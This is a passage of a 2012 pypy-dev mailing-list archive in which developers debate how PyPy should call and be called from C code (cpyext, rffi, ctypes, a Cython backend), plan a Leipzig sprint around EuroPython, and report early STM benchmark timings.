believe, in a particularly "lucky" way at all. It > works by not being written as C code at all, but as (Python and) > RPython code. The difference of levels between C and RPython is > essential in PyPy. I just gave tons of examples of why it is so. I > know it's not a perfect solution for everybody; but we think that > writing C code (or generating it straight from something else) is not > the most flexible way to develop software. Regardless of what you (or I) think, software is being written that way while we speak. A lot of software. I mean, seriously, software is being written in Cobol and Java while we speak. That "most flexible way" has little to do with reality. There is no such thing as "one ring to bind them all". Except, perhaps, C. > You may not agree with > that, and you're free too; but consider that we would be unlikely to > have a JIT in PyPy at all without the approach we took, so we think > there is some merit in it. It sounds like the JVM approach to me, though. Tons of great software has been dumped and rewritten during the last 16 years in order to get something (anything, really) that runs on top of the JVM. Let's not require PyPy users to take the same road. Even the .NET approach is smarter here. > Note that I'm pushing so much for a Cython that would emit Python code > instead of C --- but that's mostly for performance reasons on top of > PyPy. The alternative, which is quicker and only slightly more > hackish, is to complete the C API of cpyext in PyPy until it works > well enough. Don't come complaining "it's slow", though. It *is* > going to be slow. My personal take on this is: if PyPy can't come up with a fast way to interface with C code, it's bound to die. Certainly not right away, maybe it'll find a niche somewhere to survive. Some applications simply don't have native dependencies, at least not in the beginning. If it's really lucky, there'll be enough people who rewrite their software and it may still take the JVM path. But if it doesn't, well ... Stefan From romain.py at gmail.com Tue Feb 14 18:41:30 2012 From: romain.py at gmail.com (Romain Guillebert) Date: Tue, 14 Feb 2012 18:41:30 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: <20120214174130.GA6782@hardshooter> Hi everyone Having work on the Python backend for Cython I can give you what I think are the main hassles. First, ctypes semantics don't match Cython semantics (which is way closer, in a good way, to C) Second, if you work with the AST, you should reimplement stuff that don't change between Cython and Python + ctypes (ie. the syntax of a lambda function, ...), this is not really hard to do but takes a lot of time and is not very rewarding. However I think it's the right approach considering PyPy's design. I hope it helped. Thanks Romain On Tue, Feb 14, 2012 at 04:12:16PM +0100, Armin Rigo wrote: > Hi Stefan, > > On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: > > Hmm, if that is so, how would you ever want to make PyPy bidirectionally > > interface with anything at all? How does ctypes even work in PyPy? > > I believe you are not understanding my point. Obviously ctypes works > in PyPy, and not, I believe, in a particularly "lucky" way at all. It > works by not being written as C code at all, but as (Python and) > RPython code. The difference of levels between C and RPython is > essential in PyPy. I just gave tons of examples of why it is so. I > know it's not a perfect solution for everybody; but we think that > writing C code (or generating it straight from something else) is not > the most flexible way to develop software. You may not agree with > that, and you're free too; but consider that we would be unlikely to > have a JIT in PyPy at all without the approach we took, so we think > there is some merit in it. > > Note that I'm pushing so much for a Cython that would emit Python code > instead of C --- but that's mostly for performance reasons on top of > PyPy. The alternative, which is quicker and only slightly more > hackish, is to complete the C API of cpyext in PyPy until it works > well enough. Don't come complaining "it's slow", though. It *is* > going to be slow. > > > A bient?t, > > Armin. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From fijall at gmail.com Tue Feb 14 18:42:16 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 19:42:16 +0200 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 7:24 PM, Stefan Behnel wrote: > Armin Rigo, 14.02.2012 16:12: >> On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: >>> Hmm, if that is so, how would you ever want to make PyPy bidirectionally >>> interface with anything at all? How does ctypes even work in PyPy? >> >> I believe you are not understanding my point. ?Obviously ctypes works >> in PyPy, and not, I believe, in a particularly "lucky" way at all. ?It >> works by not being written as C code at all, but as (Python and) >> RPython code. ?The difference of levels between C and RPython is >> essential in PyPy. ?I just gave tons of examples of why it is so. ?I >> know it's not a perfect solution for everybody; but we think that >> writing C code (or generating it straight from something else) is not >> the most flexible way to develop software. > > Regardless of what you (or I) think, software is being written that way > while we speak. A lot of software. > > I mean, seriously, software is being written in Cobol and Java while we > speak. That "most flexible way" has little to do with reality. There is no > such thing as "one ring to bind them all". Except, perhaps, C. > > >> You may not agree with >> that, and you're free too; but consider that we would be unlikely to >> have a JIT in PyPy at all without the approach we took, so we think >> there is some merit in it. > > It sounds like the JVM approach to me, though. Tons of great software has > been dumped and rewritten during the last 16 years in order to get > something (anything, really) that runs on top of the JVM. Let's not require > PyPy users to take the same road. Even the .NET approach is smarter here. > > >> Note that I'm pushing so much for a Cython that would emit Python code >> instead of C --- but that's mostly for performance reasons on top of >> PyPy. ?The alternative, which is quicker and only slightly more >> hackish, is to complete the C API of cpyext in PyPy until it works >> well enough. ?Don't come complaining "it's slow", though. ?It *is* >> going to be slow. > > My personal take on this is: if PyPy can't come up with a fast way to > interface with C code, it's bound to die. Certainly not right away, maybe > it'll find a niche somewhere to survive. Some applications simply don't > have native dependencies, at least not in the beginning. If it's really > lucky, there'll be enough people who rewrite their software and it may > still take the JVM path. But if it doesn't, well ... > > Stefan Stefan, you're completely missing armin's point. PyPy has a good way to interface with C. You can call C from RPython using rffi and you can use ctypes. Both are not ideal for different reasons, but we're addressing both of them in some mid-term and we understand the need to interface with C. What we *don't* buy is that interfacing with C, efficient and convinient, requires you to have a stable C API that exposes objects. Even more, we don't buy that the CPython C API is the best choice here, even if you decide to have a C API. Instead we want to provide a decent and performant FFI or a way to write modules in RPython. That's why consider CPython C API mostly a legacy thing and not our way forward. Cheers, fijal From amauryfa at gmail.com Tue Feb 14 18:45:01 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Tue, 14 Feb 2012 18:45:01 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: 2012/2/14 Stefan Behnel > if PyPy can't come up with a fast way to > interface with C code, it's bound to die. > But it certainly can! For example PyPy implements the _ssl and pyexpat modules, which are interfaces to the openssl and expat libraries. And it does that by generating C code that calls the corresponding functions. See for example the code for SSLObject.write(): https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 it calls the C function SSL_write(), which is declared like this: https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 This kind of code is not difficult to write (in this case, it's a simple translation of CPython modules) and is close enough to C when you really need it. For example, it's possible to use macros when they look like function calls, or embed C snippets. A C API is not the only way to interface with C libraries. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Tue Feb 14 18:49:51 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 18:49:51 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Hi Stefan, On Tue, Feb 14, 2012 at 18:24, Stefan Behnel wrote: > My personal take on this is: if PyPy can't come up with a fast way to > interface with C code, it's bound to die. (...) I think you are seeing the world through the pin's hole of what would be needed for Cython's C files to compile nicely with PyPy. While I don't completely disagree with you, I do believe that there are other worthwhile options, as Fijal and Amaury just said --- and I also believe that there is incredibly more to PyPy than just that issue. A bient?t, Armin. From stefan_ml at behnel.de Tue Feb 14 18:56:44 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 18:56:44 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Amaury Forgeot d'Arc, 14.02.2012 18:45: > 2012/2/14 Stefan Behnel >> if PyPy can't come up with a fast way to >> interface with C code, it's bound to die. > > But it certainly can! For example PyPy implements the _ssl and pyexpat > modules, > which are interfaces to the openssl and expat libraries. > And it does that by generating C code that calls the corresponding > functions. > > See for example the code for SSLObject.write(): > https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 > it calls the C function SSL_write(), which is declared like this: > https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 > This kind of code is not difficult to write (in this case, it's a simple > translation of > CPython modules) and is close enough to C when you really need it. > For example, it's possible to use macros when they look like function calls, > or embed C snippets. Ok, then I take it that this would be the preferred Python+FFI approach for interfacing, right? ctypes is out of the loop? Stefan From fijall at gmail.com Tue Feb 14 19:00:20 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 20:00:20 +0200 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 7:56 PM, Stefan Behnel wrote: > Amaury Forgeot d'Arc, 14.02.2012 18:45: >> 2012/2/14 Stefan Behnel >>> if PyPy can't come up with a fast way to >>> interface with C code, it's bound to die. >> >> But it certainly can! For example PyPy implements the _ssl and pyexpat >> modules, >> which are interfaces to the openssl and expat libraries. >> And it does that by generating C code that calls the corresponding >> functions. >> >> See for example the code for SSLObject.write(): >> https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 >> it calls the C function SSL_write(), which is declared like this: >> https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 >> This kind of code is not difficult to write (in this case, it's a simple >> translation of >> CPython modules) and is close enough to C when you really need it. >> For example, it's possible to use macros when they look like function calls, >> or embed C snippets. > > Ok, then I take it that this would be the preferred Python+FFI approach for > interfacing, right? ctypes is out of the loop? > > Stefan Ideally it would be a better FFI than ctypes in my opinion. Cheers, fijal From markflorisson88 at gmail.com Tue Feb 14 19:05:00 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 18:05:00 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On 14 February 2012 18:00, Maciej Fijalkowski wrote: > On Tue, Feb 14, 2012 at 7:56 PM, Stefan Behnel wrote: >> Amaury Forgeot d'Arc, 14.02.2012 18:45: >>> 2012/2/14 Stefan Behnel >>>> if PyPy can't come up with a fast way to >>>> interface with C code, it's bound to die. >>> >>> But it certainly can! For example PyPy implements the _ssl and pyexpat >>> modules, >>> which are interfaces to the openssl and expat libraries. >>> And it does that by generating C code that calls the corresponding >>> functions. >>> >>> See for example the code for SSLObject.write(): >>> https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 >>> it calls the C function SSL_write(), which is declared like this: >>> https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 >>> This kind of code is not difficult to write (in this case, it's a simple >>> translation of >>> CPython modules) and is close enough to C when you really need it. >>> For example, it's possible to use macros when they look like function calls, >>> or embed C snippets. >> >> Ok, then I take it that this would be the preferred Python+FFI approach for >> interfacing, right? ctypes is out of the loop? >> >> Stefan > > Ideally it would be a better FFI than ctypes in my opinion. > > Cheers, > fijal > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev The issue is not really to interface pypy with C, it obviously can. The problem is really to do it the other way around. Cython is just one example that wants to do it the other way around, but only because it currently works that way. It would be great if we would only ever go from Python into C libraries and back again, but Python and C stacks can be interwoven arbitrarily through callbacks (or directly by the library itself), which are not uncommon at all in Cython. I think if RPython were targeted (which sounds like a good idea), then there would still need to be some mechanisms to go back from those C libraries into PyPy land. It wouldn't need a large C API, but some minimalistic functionality would need to be there, which I'm sure could be supported by various different backends (think of things like PyGILState_Ensure() and PyObject_Call()). I think the FFI itself is a mere convenience. From anto.cuni at gmail.com Tue Feb 14 19:10:11 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 19:10:11 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: <4F3AA383.2010001@gmail.com> On 02/14/2012 06:56 PM, Stefan Behnel wrote: > Ok, then I take it that this would be the preferred Python+FFI approach for > interfacing, right? ctypes is out of the loop? note that there are at least two different levels to interface with C code. The first is using rffi, which lets you to call C code from RPython. Calls to rffi functions are translated into C calls at translation time. Then, there is the ctypes-like approach, which lets you to call C from applevel code, which is basically a layer on top of libffi. The ctypes approach has some pretty important advantages, e.g. you don't need a compiler, people don't need to learn another language, the development is faster, etc. On the other hand, I think that most of us agree that the ctypes interface is terrible. What I would like is an ffi module which is applevel but with a much nicer interface. And, the JIT compiler can turn these calls into very efficient machine code. We do need both alternatives in PyPy, if anything because ctypes or this yet-to-come "ffi" module need to be implemented in RPython and thus depends on rffi. However, once it's ready the ffi module should ideally be powerful enough to interface with all the C code out there. ciao, Anto From stefan_ml at behnel.de Tue Feb 14 19:13:17 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 19:13:17 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Maciej Fijalkowski, 14.02.2012 19:00: > On Tue, Feb 14, 2012 at 7:56 PM, Stefan Behnel wrote: >> Amaury Forgeot d'Arc, 14.02.2012 18:45: >>> 2012/2/14 Stefan Behnel >>>> if PyPy can't come up with a fast way to >>>> interface with C code, it's bound to die. >>> >>> But it certainly can! For example PyPy implements the _ssl and pyexpat >>> modules, >>> which are interfaces to the openssl and expat libraries. >>> And it does that by generating C code that calls the corresponding >>> functions. >>> >>> See for example the code for SSLObject.write(): >>> https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 >>> it calls the C function SSL_write(), which is declared like this: >>> https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 >>> This kind of code is not difficult to write (in this case, it's a simple >>> translation of >>> CPython modules) and is close enough to C when you really need it. >>> For example, it's possible to use macros when they look like function calls, >>> or embed C snippets. >> >> Ok, then I take it that this would be the preferred Python+FFI approach for >> interfacing, right? ctypes is out of the loop? > > Ideally it would be a better FFI than ctypes in my opinion. Erm, what do you mean by "ideally"? Would you not consider rffi usable or ready enough for being used for this? Do you mean there should be yet another FFI? Simple questions: Is rffi usable in this context or is it not? Does it require RPython code to be generated or does it also work with Python code? How do callbacks work in rffi? Does rffi provide access to PyPy objects? And how so? I don't know all that much about RPython. Would it work to generate RPython from Cython? Is there a transformation to map regular Python code down to RPython? (e.g. by renaming variables, templating, specialising, etc.) Stefan From markflorisson88 at gmail.com Tue Feb 14 19:17:13 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 18:17:13 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F3AA383.2010001@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3AA383.2010001@gmail.com> Message-ID: On 14 February 2012 18:10, Antonio Cuni wrote: > On 02/14/2012 06:56 PM, Stefan Behnel wrote: >> >> Ok, then I take it that this would be the preferred Python+FFI approach >> for >> interfacing, right? ctypes is out of the loop? > > > note that there are at least two different levels to interface with C code. > > The first is using rffi, which lets you to call C code from RPython. Calls > to rffi functions are translated into C calls at translation time. > > Then, there is the ctypes-like approach, which lets you to call C from > applevel code, which is basically a layer on top of libffi. > The ctypes approach has some pretty important advantages, e.g. you don't > need a compiler, people don't need to learn another language, the > development is faster, etc. In general, that's nice. For Cython that wouldn't really matter, it is compiling anyway, might as well add another pass :) > On the other hand, I think that most of us agree that the ctypes interface > is terrible. What I would like is an ffi module which is applevel but with a > much nicer interface. And, the JIT compiler can turn these calls into very > efficient machine code. > > We do need both alternatives in PyPy, if anything because ctypes or this > yet-to-come "ffi" module need to be implemented in RPython and thus depends > on rffi. > However, once it's ready the ffi module should ideally be powerful enough to > interface with all the C code out there. > > ciao, > Anto > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From stefan_ml at behnel.de Tue Feb 14 19:41:32 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 19:41:32 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Stefan Behnel, 14.02.2012 19:13: > Simple questions: > > Is rffi usable in this context or is it not? Does it require RPython code > to be generated or does it also work with Python code? How do callbacks > work in rffi? Does rffi provide access to PyPy objects? And how so? > > I don't know all that much about RPython. Would it work to generate RPython > from Cython? Is there a transformation to map regular Python code down to > RPython? (e.g. by renaming variables, templating, specialising, etc.) And, in case it turns out to be too involved to answer these questions on the mailing list, I may be able to join in for the sprint in Leipzig (in case it's still planned for June), at least for a Friday or Saturday. Would that make sense? That's still pretty far from now, but from the current discussion, I have my doubts that there will be a major breakthrough before that. Stefan From fijall at gmail.com Tue Feb 14 19:46:28 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 20:46:28 +0200 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 8:13 PM, Stefan Behnel wrote: > Maciej Fijalkowski, 14.02.2012 19:00: >> On Tue, Feb 14, 2012 at 7:56 PM, Stefan Behnel wrote: >>> Amaury Forgeot d'Arc, 14.02.2012 18:45: >>>> 2012/2/14 Stefan Behnel >>>>> if PyPy can't come up with a fast way to >>>>> interface with C code, it's bound to die. >>>> >>>> But it certainly can! For example PyPy implements the _ssl and pyexpat >>>> modules, >>>> which are interfaces to the openssl and expat libraries. >>>> And it does that by generating C code that calls the corresponding >>>> functions. >>>> >>>> See for example the code for SSLObject.write(): >>>> https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 >>>> it calls the C function SSL_write(), which is declared like this: >>>> https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 >>>> This kind of code is not difficult to write (in this case, it's a simple >>>> translation of >>>> CPython modules) and is close enough to C when you really need it. >>>> For example, it's possible to use macros when they look like function calls, >>>> or embed C snippets. >>> >>> Ok, then I take it that this would be the preferred Python+FFI approach for >>> interfacing, right? ctypes is out of the loop? >> >> Ideally it would be a better FFI than ctypes in my opinion. > > Erm, what do you mean by "ideally"? Would you not consider rffi usable or > ready enough for being used for this? Do you mean there should be yet > another FFI? > > Simple questions: > > Is rffi usable in this context or is it not? Does it require RPython code > to be generated or does it also work with Python code? How do callbacks > work in rffi? Does rffi provide access to PyPy objects? And how so? > > I don't know all that much about RPython. Would it work to generate RPython > from Cython? Is there a transformation to map regular Python code down to > RPython? (e.g. by renaming variables, templating, specialising, etc.) > > Stefan > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Rffi is an internal RPython detail, it works before compilation but only as a testing layer. People should not use it (at least right now). Maybe it's actually reusable as an API, but needs to be extracted a bit from pypy in order to work on top of python (it imports something like 3/4 of pypy source tree). It also only works by a very hackish layer on top of ctypes and it's surely not efficient. I imagine something slightly better that does roughly the same but does not have to be RPython. Cheers, fijal From stefan_ml at behnel.de Wed Feb 15 12:32:36 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Wed, 15 Feb 2012 12:32:36 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together Message-ID: Hi, I'm breaking out of the thread where this topic was started ("offtopic, ontopic, ...") because it is getting too long and unfocussed to follow. The current state of the discussion seems to be that PyPy provides ways to talk to C code, but nothing as complete as CPython's C-API in the sense that it allows efficient two-way communication between C code and Python objects. Thus, we need to either improve this or look for alternatives. In order to get us more focussed on what can be done and what the implications are, so that we may eventually be able to decide what should be done, I started a Wiki page for a PyPy backend CEP (Cython Enhancement Proposal). http://wiki.cython.org/enhancements/pypy Please add to it as you see fit. In general, it is ok for a CEP to present diverging arguments, but please try to give them a structure in order to keep the overall document focussed. Stefan From arigo at tunes.org Wed Feb 15 15:24:42 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 15 Feb 2012 15:24:42 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> Message-ID: Hi, On Sat, Jan 28, 2012 at 12:31, Armin Rigo wrote: >> So let's plan to have the sprint dates announced no later than two weeks >> after the EuroPython dates are written on the EuroPython website. >> What do you think? The dates are now published: from the 2nd to the 6th of July, with sprints the 7-8th. Armin From anto.cuni at gmail.com Wed Feb 15 15:33:34 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Wed, 15 Feb 2012 15:33:34 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> Message-ID: <4F3BC23E.703@gmail.com> On 02/15/2012 03:24 PM, Armin Rigo wrote: > The dates are now published: from the 2nd to the 6th of July, with > sprints the 7-8th. we should also decide whether we want to have a post EP sprint in italy near Genova (possibly again in Pegli, or maybe somewhere else), although there is the risk that having a pre-EP sprint, EP and then another full sprint might become too intensive. What do people think about this? From mmueller at python-academy.de Wed Feb 15 15:35:16 2012 From: mmueller at python-academy.de (=?ISO-8859-1?Q?Mike_M=FCller?=) Date: Wed, 15 Feb 2012 15:35:16 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> Message-ID: <4F3BC2A4.4000105@python-academy.de> Am 15.02.12 15:24, schrieb Armin Rigo: > Hi, > > On Sat, Jan 28, 2012 at 12:31, Armin Rigo wrote: >>> So let's plan to have the sprint dates announced no later than two weeks >>> after the EuroPython dates are written on the EuroPython website. >>> What do you think? > > The dates are now published: from the 2nd to the 6th of July, with > sprints the 7-8th. Good. Let's fix the date for the "PyPy Sprint Leipzig 2012". The week before EuroPython starts Monday June 25, which gives us June 25 - June 30, 2012. Does this period fit? Do you want to shorten, shift or otherwise modify it? Cheers, Mike From fijall at gmail.com Wed Feb 15 16:09:45 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 15 Feb 2012 17:09:45 +0200 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F3BC2A4.4000105@python-academy.de> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> Message-ID: On Wed, Feb 15, 2012 at 4:35 PM, Mike M?ller wrote: > Am 15.02.12 15:24, schrieb Armin Rigo: >> Hi, >> >> On Sat, Jan 28, 2012 at 12:31, Armin Rigo wrote: >>>> So let's plan to have the sprint dates announced no later than two weeks >>>> after the EuroPython dates are written on the EuroPython website. >>>> What do you think? >> >> The dates are now published: from the 2nd to the 6th of July, with >> sprints the 7-8th. > > Good. Let's fix the date for the "PyPy Sprint Leipzig 2012". > The week before EuroPython starts Monday June 25, which gives > us June 25 - June 30, 2012. Does this period fit? Do you want to > shorten, shift or otherwise modify it? Very good for me From arigo at tunes.org Wed Feb 15 17:52:31 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 15 Feb 2012 17:52:31 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> Message-ID: Hi, On Wed, Feb 15, 2012 at 16:09, Maciej Fijalkowski wrote: >> Good. Let's fix the date for the "PyPy Sprint Leipzig 2012". >> The week before EuroPython starts Monday June 25, which gives >> us June 25 - June 30, 2012. Does this period fit? Do you want to >> shorten, shift or otherwise modify it? > > Very good for me It's not that great to have EuroPython immediately after the sprint without any day for recuperation. :-/ I would personally prefer it the previous week, for this reason. A bient?t, Armin. From fijall at gmail.com Wed Feb 15 17:54:45 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Wed, 15 Feb 2012 18:54:45 +0200 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> Message-ID: On Wed, Feb 15, 2012 at 6:52 PM, Armin Rigo wrote: > Hi, > > On Wed, Feb 15, 2012 at 16:09, Maciej Fijalkowski wrote: >>> Good. Let's fix the date for the "PyPy Sprint Leipzig 2012". >>> The week before EuroPython starts Monday June 25, which gives >>> us June 25 - June 30, 2012. Does this period fit? Do you want to >>> shorten, shift or otherwise modify it? >> >> Very good for me > > It's not that great to have EuroPython immediately after the sprint > without any day for recuperation. :-/ ?I would personally prefer it > the previous week, for this reason. > > > A bient?t, > > Armin. Even better for me. From faassen at startifact.com Wed Feb 15 18:15:17 2012 From: faassen at startifact.com (Martijn Faassen) Date: Wed, 15 Feb 2012 18:15:17 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Hey, http://wiki.cython.org/enhancements/pypy Nice overview of the discussion so far as far I could follow it. I hope others contribute! Regards, Martijn From anto.cuni at gmail.com Wed Feb 15 18:27:23 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Wed, 15 Feb 2012 18:27:23 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> Message-ID: <4F3BEAFB.9000406@gmail.com> On 02/15/2012 05:52 PM, Armin Rigo wrote: > It's not that great to have EuroPython immediately after the sprint > without any day for recuperation. :-/ I would personally prefer it > the previous week, for this reason. as for me, I'm busy in the days around 22-24 of june, and I also would like not to have a sprint immediately before EP. With these constraints, it seems very unlikely that I'll manage to do the sprint :-( From arigo at tunes.org Thu Feb 16 21:58:18 2012 From: arigo at tunes.org (Armin Rigo) Date: Thu, 16 Feb 2012 21:58:18 +0100 Subject: [pypy-dev] STM status Message-ID: Hi all, An update for STM: today I managed to build a pypy using the new "stm gc". It runs richards.py on tannit: in 1 thread: 2320 ms per iteration in 2 threads: 1410 ms per iteration in 4 threads: 785 ms per iteration in 8 threads: 685 ms per iteration The small gap between 4 and 8 threads is due to tannit having only 4 "real" cpus, each one hyperthreaded. The additional gain is thus smaller than expected. For comparison, a "pypy --jit off" runs at 650ms per iteration. So the single-threaded performance is already at only 3.6x worse, and moreover there are still a few easy big-win optimizations. I will confirm it in a few days, but I would say that this shows it's working quite well. :-) At least, it's fun to see in "top" a single pypy process using 397% cpu :-) For people interested, it is in the "stm-gc" branch; at least bba9b03f5e70 works. Linux-only for now: " translate.py -O1 --stm targetpypystandalone --no-allworkingmodules --withmod-transaction --withmod-select --withmod-_socket ". The modified version of richards.py I use is in pypy/translator/stm/test/. A bient?t, Armin. From mmueller at python-academy.de Thu Feb 16 22:07:25 2012 From: mmueller at python-academy.de (=?ISO-8859-1?Q?Mike_M=FCller?=) Date: Thu, 16 Feb 2012 22:07:25 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F3BEAFB.9000406@gmail.com> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> Message-ID: <4F3D700D.5010009@python-academy.de> Am 15.02.12 18:27, schrieb Antonio Cuni: > On 02/15/2012 05:52 PM, Armin Rigo wrote: >> It's not that great to have EuroPython immediately after the sprint >> without any day for recuperation. :-/ I would personally prefer it >> the previous week, for this reason. > > as for me, I'm busy in the days around 22-24 of june, and I also would like not > to have a sprint immediately before EP. > With these constraints, it seems very unlikely that I'll manage to do the > sprint :-( We can move the date. One week or only a few days? Like 22nd till 27th of June would put four days in between the sprint and EP. Mike From arigo at tunes.org Thu Feb 16 